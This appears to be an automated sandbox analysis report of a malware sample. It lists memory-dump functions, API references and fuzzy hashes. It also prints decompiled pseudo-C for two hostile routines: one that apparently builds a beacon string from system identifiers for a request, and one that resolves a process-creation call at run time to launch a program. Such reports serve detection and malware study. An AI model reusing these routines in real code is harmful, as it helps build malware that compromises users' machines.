                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 949163717-0
                                                                                                                                  • Opcode ID: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction ID: f5b76edcd0818ccb7702ed09539865fab5fd7df22fd364fd79be819ae7d38921
                                                                                                                                  • Opcode Fuzzy Hash: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction Fuzzy Hash: B7515B71A0072AABEF51DFE6CC44AAEB7BCBF59304F24046AA911E7180E770DD408F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E906CAF, Relevance: 48.3, APIs: 32, Instructions: 287COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E906CB6
                                                                                                                                  • collate.LIBCPMT ref: 6E906CBF
                                                                                                                                    • Part of subcall function 6E9059D8: __EH_prolog3_GS.LIBCMT ref: 6E9059DF
                                                                                                                                    • Part of subcall function 6E9059D8: __Getcoll.LIBCPMT ref: 6E905A43
                                                                                                                                    • Part of subcall function 6E9059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E905A5F
                                                                                                                                  • __Getcoll.LIBCPMT ref: 6E906D05
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D19
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D2E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D7F
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EB4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EC7
                                                                                                                                  • int.LIBCPMT ref: 6E906ED4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EE4
                                                                                                                                  • int.LIBCPMT ref: 6E906EF1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F01
                                                                                                                                  • int.LIBCPMT ref: 6E906F0E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F1E
                                                                                                                                  • int.LIBCPMT ref: 6E906CDF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • int.LIBCPMT ref: 6E906D42
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D6C
                                                                                                                                  • int.LIBCPMT ref: 6E906D97
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DC5
                                                                                                                                  • int.LIBCPMT ref: 6E906DD2
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DF9
                                                                                                                                  • int.LIBCPMT ref: 6E906E06
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906E56
                                                                                                                                  • int.LIBCPMT ref: 6E906E63
                                                                                                                                  • int.LIBCPMT ref: 6E906F36
                                                                                                                                  • numpunct.LIBCPMT ref: 6E906F5D
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F6D
                                                                                                                                  • int.LIBCPMT ref: 6E906F7A
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FB1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FC4
                                                                                                                                  • int.LIBCPMT ref: 6E906FD1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2009638416-0
                                                                                                                                  • Opcode ID: 5195ae5fe1ba27b78dce64a43bb060e5bbb0142ffaecce9ce4d23e93c20746c1
                                                                                                                                  • Instruction ID: 82ef8fcf1f7143299f74a75ee5823f1482c64c909b969f933c8b51682a3cdcb0
                                                                                                                                  • Opcode Fuzzy Hash: 5195ae5fe1ba27b78dce64a43bb060e5bbb0142ffaecce9ce4d23e93c20746c1
                                                                                                                                  • Instruction Fuzzy Hash: A591E971D14311AFEB205FF98C556BF7AAC9FA2794F404C1CE844AB681EB74C941CBA2
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A6109, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E031A6109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x31ad018; // 0x53709a90
				asm("bswap eax");
				_t61 =  *0x31ad014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x31ad010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x31ad00c; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x31ad2e0; // 0x2a2a5a8
				_t3 = _t64 + 0x31ae633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x31ad02c,  *0x31ad004, _t59);
				_t67 = E031A5B60();
				_t68 =  *0x31ad2e0; // 0x2a2a5a8
				_t4 = _t68 + 0x31ae673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E031A1BBF(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x31ad2e0; // 0x2a2a5a8
					_t7 = _t126 + 0x31ae8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x31ad270, 0, _v8);
				}
				_t73 = E031A137A();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x31ad2e0; // 0x2a2a5a8
					_t11 = _t121 + 0x31ae8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x31ad270, 0, _v8);
				}
				_t146 =  *0x31ad364; // 0x5bd95b0
				_t75 = E031A3857(0x31ad00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x31ad270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x31ad270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x31ad270, _t152, _v20);
						goto L26;
					}
					E031AA811(GetTickCount());
					_t82 =  *0x31ad364; // 0x5bd95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x31ad364; // 0x5bd95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x31ad364; // 0x5bd95b0
					_t148 = E031A1974(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x31ad270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x31ac2ac);
					_push(_t148);
					_t94 = E031A38CA();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x31ad270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E031A1922( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E031A47D5();
						L22:
						HeapFree( *0x31ad270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E031A365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E031A3273(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E031A4AAB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E031A8FB2(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E031A4AAB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                                                                                                  0x031a6109
                                                                                                                                  0x031a6109
                                                                                                                                  0x031a6109
                                                                                                                                  0x031a6112
                                                                                                                                  0x031a611b
                                                                                                                                  0x031a611d
                                                                                                                                  0x031a611d
                                                                                                                                  0x031a612a
                                                                                                                                  0x031a6135
                                                                                                                                  0x031a6138
                                                                                                                                  0x031a613d
                                                                                                                                  0x031a6146
                                                                                                                                  0x031a6149
                                                                                                                                  0x031a614e
                                                                                                                                  0x031a6151
                                                                                                                                  0x031a6156
                                                                                                                                  0x031a6159
                                                                                                                                  0x031a6165
                                                                                                                                  0x031a6172
                                                                                                                                  0x031a6174
                                                                                                                                  0x031a617a
                                                                                                                                  0x031a617f
                                                                                                                                  0x031a618a
                                                                                                                                  0x031a618c
                                                                                                                                  0x031a618f
                                                                                                                                  0x031a6191
                                                                                                                                  0x031a6196
                                                                                                                                  0x031a619c
                                                                                                                                  0x031a61a1
                                                                                                                                  0x031a61a4
                                                                                                                                  0x031a61a9
                                                                                                                                  0x031a61b6
                                                                                                                                  0x031a61b8
                                                                                                                                  0x031a61be
                                                                                                                                  0x031a61c8
                                                                                                                                  0x031a61c8
                                                                                                                                  0x031a61ca
                                                                                                                                  0x031a61cf
                                                                                                                                  0x031a61d4
                                                                                                                                  0x031a61d7
                                                                                                                                  0x031a61dc
                                                                                                                                  0x031a61e9
                                                                                                                                  0x031a61eb
                                                                                                                                  0x031a61f9
                                                                                                                                  0x031a61f9
                                                                                                                                  0x031a61fb
                                                                                                                                  0x031a6209
                                                                                                                                  0x031a620e
                                                                                                                                  0x031a6210
                                                                                                                                  0x031a6215
                                                                                                                                  0x031a63d6
                                                                                                                                  0x031a63e0
                                                                                                                                  0x031a63e9
                                                                                                                                  0x031a621b
                                                                                                                                  0x031a6227
                                                                                                                                  0x031a622d
                                                                                                                                  0x031a6232
                                                                                                                                  0x031a63ca
                                                                                                                                  0x031a63d4
                                                                                                                                  0x00000000
                                                                                                                                  0x031a63d4
                                                                                                                                  0x031a623e
                                                                                                                                  0x031a6243
                                                                                                                                  0x031a624c
                                                                                                                                  0x031a625d
                                                                                                                                  0x031a6261
                                                                                                                                  0x031a626a
                                                                                                                                  0x031a6270
                                                                                                                                  0x031a627f
                                                                                                                                  0x031a6286
                                                                                                                                  0x031a628f
                                                                                                                                  0x031a6295
                                                                                                                                  0x031a63be
                                                                                                                                  0x031a63c8
                                                                                                                                  0x00000000
                                                                                                                                  0x031a63c8
                                                                                                                                  0x031a62a1
                                                                                                                                  0x031a62a7
                                                                                                                                  0x031a62a8
                                                                                                                                  0x031a62ad
                                                                                                                                  0x031a62b2
                                                                                                                                  0x031a63b4
                                                                                                                                  0x031a63bc
                                                                                                                                  0x00000000
                                                                                                                                  0x031a63bc
                                                                                                                                  0x031a62bb
                                                                                                                                  0x031a62c2
                                                                                                                                  0x031a62ca
                                                                                                                                  0x031a62cf
                                                                                                                                  0x031a62d8
                                                                                                                                  0x031a62e3
                                                                                                                                  0x031a62e8
                                                                                                                                  0x031a62ed
                                                                                                                                  0x031a63ec
                                                                                                                                  0x031a63a0
                                                                                                                                  0x031a63a0
                                                                                                                                  0x031a63a5
                                                                                                                                  0x031a63b0
                                                                                                                                  0x031a63b2
                                                                                                                                  0x00000000
                                                                                                                                  0x031a63b2
                                                                                                                                  0x031a62f7
                                                                                                                                  0x031a62fc
                                                                                                                                  0x031a6301
                                                                                                                                  0x031a6306
                                                                                                                                  0x031a6316
                                                                                                                                  0x031a6319
                                                                                                                                  0x031a631f
                                                                                                                                  0x031a6325
                                                                                                                                  0x031a632b
                                                                                                                                  0x031a632e
                                                                                                                                  0x031a6334
                                                                                                                                  0x031a6337
                                                                                                                                  0x031a633c
                                                                                                                                  0x031a6340
                                                                                                                                  0x031a6340
                                                                                                                                  0x031a634c
                                                                                                                                  0x031a6358
                                                                                                                                  0x031a635c
                                                                                                                                  0x031a635e
                                                                                                                                  0x031a6363
                                                                                                                                  0x031a6365
                                                                                                                                  0x031a636a
                                                                                                                                  0x031a636f
                                                                                                                                  0x031a637c
                                                                                                                                  0x031a6384
                                                                                                                                  0x031a6387
                                                                                                                                  0x031a6387
                                                                                                                                  0x031a6363
                                                                                                                                  0x00000000
                                                                                                                                  0x031a634e
                                                                                                                                  0x031a6352
                                                                                                                                  0x031a6389
                                                                                                                                  0x031a638c
                                                                                                                                  0x031a6395
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a6395
                                                                                                                                  0x031a6354
                                                                                                                                  0x00000000
                                                                                                                                  0x031a6354
                                                                                                                                  0x031a634c

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A611D
                                                                                                                                  • wsprintfA.USER32 ref: 031A616D
                                                                                                                                  • wsprintfA.USER32 ref: 031A618A
                                                                                                                                  • wsprintfA.USER32 ref: 031A61B6
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 031A61C8
                                                                                                                                  • wsprintfA.USER32 ref: 031A61E9
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 031A61F9
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031A6227
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A6238
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(05BD9570), ref: 031A624C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(05BD9570), ref: 031A626A
                                                                                                                                    • Part of subcall function 031A1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,031A4653,?,05BD95B0), ref: 031A199F
                                                                                                                                    • Part of subcall function 031A1974: lstrlen.KERNEL32(?,?,?,031A4653,?,05BD95B0), ref: 031A19A7
                                                                                                                                    • Part of subcall function 031A1974: strcpy.NTDLL ref: 031A19BE
                                                                                                                                    • Part of subcall function 031A1974: lstrcat.KERNEL32(00000000,?), ref: 031A19C9
                                                                                                                                    • Part of subcall function 031A1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031A4653,?,05BD95B0), ref: 031A19E6
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,031AC2AC,?,05BD95B0), ref: 031A62A1
                                                                                                                                    • Part of subcall function 031A38CA: lstrlen.KERNEL32(05BD9B10,00000000,00000000,7691C740,031A467E,00000000), ref: 031A38DA
                                                                                                                                    • Part of subcall function 031A38CA: lstrlen.KERNEL32(?), ref: 031A38E2
                                                                                                                                    • Part of subcall function 031A38CA: lstrcpy.KERNEL32(00000000,05BD9B10), ref: 031A38F6
                                                                                                                                    • Part of subcall function 031A38CA: lstrcat.KERNEL32(00000000,?), ref: 031A3901
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 031A62C2
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 031A62CA
                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 031A62D8
                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 031A62DE
                                                                                                                                    • Part of subcall function 031A1922: lstrlen.KERNEL32(?,00000000,05BD9B38,00000000,031A74FF,05BD9D16,?,?,?,?,?,69B25F44,00000005,031AD00C), ref: 031A1929
                                                                                                                                    • Part of subcall function 031A1922: mbstowcs.NTDLL ref: 031A1952
                                                                                                                                    • Part of subcall function 031A1922: memset.NTDLL ref: 031A1964
                                                                                                                                  • wcstombs.NTDLL ref: 031A636F
                                                                                                                                    • Part of subcall function 031A3273: SysAllocString.OLEAUT32(?), ref: 031A32AE
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 031A63B0
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 031A63BC
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,05BD95B0), ref: 031A63C8
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 031A63D4
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 031A63E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3748877296-8415677
                                                                                                                                  • Opcode ID: da012d52c4036d338fa0059189febd5015896afb055b4134b1ea205ba3cc4018
                                                                                                                                  • Instruction ID: efa53d26e6980f1bbbba68acff6287ee352a5f7e1d8101447a42ba69719bda2a
                                                                                                                                  • Opcode Fuzzy Hash: da012d52c4036d338fa0059189febd5015896afb055b4134b1ea205ba3cc4018
                                                                                                                                  • Instruction Fuzzy Hash: 33914B79900A08AFCB15EFA8ED44A9E7BB9FF4C312F184055F409D7250DB31D991DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 6E93B2E8
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA15
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA27
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA39
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA4B
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA5D
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA6F
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA81
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA93
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAA5
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAB7
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAC9
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CADB
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAED
                                                                                                                                  • _free.LIBCMT ref: 6E93B2DD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93B2FF
                                                                                                                                  • _free.LIBCMT ref: 6E93B314
                                                                                                                                  • _free.LIBCMT ref: 6E93B31F
                                                                                                                                  • _free.LIBCMT ref: 6E93B341
                                                                                                                                  • _free.LIBCMT ref: 6E93B354
                                                                                                                                  • _free.LIBCMT ref: 6E93B362
                                                                                                                                  • _free.LIBCMT ref: 6E93B36D
                                                                                                                                  • _free.LIBCMT ref: 6E93B3A5
                                                                                                                                  • _free.LIBCMT ref: 6E93B3AC
                                                                                                                                  • _free.LIBCMT ref: 6E93B3C9
                                                                                                                                  • _free.LIBCMT ref: 6E93B3E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction ID: eb78d8570a4bbdc9c95a2e08f4bf35dd40646a14c0041922e4eb7bc93e1da6a4
                                                                                                                                  • Opcode Fuzzy Hash: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction Fuzzy Hash: FB317E31605A219FEB609BB9E844BDAB3FCAF51354F744819E454D6269EF30EC54CF10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A1000, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E031A1000(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E031A4837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E031AA938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x31ad298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x31ad2e0; // 0x2a2a5a8
					_t18 = _t47 + 0x31ae3b3; // 0x73797325
					_t68 = E031A2291(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x31ad2e0; // 0x2a2a5a8
						_t19 = _t50 + 0x31ae760; // 0x5bd8d08
						_t20 = _t50 + 0x31ae0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E031A34C7();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E031A34C7();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x31ad270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E031A4AAB(_t70);
				goto L12;
			}


















                                                                                                                                  0x031a1008
                                                                                                                                  0x031a1008
                                                                                                                                  0x031a1017
                                                                                                                                  0x031a101e
                                                                                                                                  0x031a1023
                                                                                                                                  0x031a1130
                                                                                                                                  0x031a1137
                                                                                                                                  0x031a1137
                                                                                                                                  0x031a1032
                                                                                                                                  0x031a103a
                                                                                                                                  0x031a103d
                                                                                                                                  0x031a1042
                                                                                                                                  0x031a1057
                                                                                                                                  0x031a105d
                                                                                                                                  0x031a105e
                                                                                                                                  0x031a1061
                                                                                                                                  0x031a1067
                                                                                                                                  0x031a106a
                                                                                                                                  0x031a106f
                                                                                                                                  0x031a1077
                                                                                                                                  0x031a1083
                                                                                                                                  0x031a1087
                                                                                                                                  0x031a1117
                                                                                                                                  0x031a108d
                                                                                                                                  0x031a108d
                                                                                                                                  0x031a1092
                                                                                                                                  0x031a1099
                                                                                                                                  0x031a10ad
                                                                                                                                  0x031a10b1
                                                                                                                                  0x031a1100
                                                                                                                                  0x031a10b3
                                                                                                                                  0x031a10b4
                                                                                                                                  0x031a10bb
                                                                                                                                  0x031a10d4
                                                                                                                                  0x031a10d6
                                                                                                                                  0x031a10da
                                                                                                                                  0x031a10e1
                                                                                                                                  0x031a10fb
                                                                                                                                  0x031a10e3
                                                                                                                                  0x031a10ec
                                                                                                                                  0x031a10f1
                                                                                                                                  0x031a10f1
                                                                                                                                  0x031a10e1
                                                                                                                                  0x031a110f
                                                                                                                                  0x031a110f
                                                                                                                                  0x031a1087
                                                                                                                                  0x031a111e
                                                                                                                                  0x031a1127
                                                                                                                                  0x031a112b
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A4837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,031A101C,?,00000001,?,?,00000000,00000000), ref: 031A485C
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 031A487E
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 031A4894
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 031A48AA
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 031A48C0
                                                                                                                                    • Part of subcall function 031A4837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 031A48D6
                                                                                                                                  • memset.NTDLL ref: 031A106A
                                                                                                                                    • Part of subcall function 031A2291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,031A1083,73797325), ref: 031A22A2
                                                                                                                                    • Part of subcall function 031A2291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 031A22BC
                                                                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,05BD8D08,73797325), ref: 031A10A0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 031A10A7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A110F
                                                                                                                                    • Part of subcall function 031A34C7: GetProcAddress.KERNEL32(36776F57,031A5B13), ref: 031A34E2
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 031A10EC
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 031A10F1
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 031A10F5
